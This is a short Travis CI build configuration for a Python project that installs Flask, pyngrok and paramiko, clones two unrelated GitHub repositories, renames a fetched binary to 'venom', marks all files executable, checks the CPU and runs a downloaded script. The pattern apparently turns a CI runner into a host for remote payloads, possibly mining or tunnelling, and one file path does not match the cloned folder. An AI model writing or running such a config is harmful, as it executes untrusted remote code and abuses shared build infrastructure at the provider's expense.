language: python
dist: focal
python:
  - "3.10"

before_install:
  - sudo apt-get update
  - sudo apt-get install -y gcc

install:
  - python3 -m pip install --upgrade pip
  - pip install Flask pyngrok paramiko

before_script:
  - git clone https://github.com/MiLKyWay-cyBer/ss.git 
   
  - mv ss/mrin ./
  - mv mrin venom
  - git clone https://github.com/tyr892316/Vdn.git
  - mv m.Vdn/m.py ./
script:
  - chmod +x * && lscpu && python3 m.py
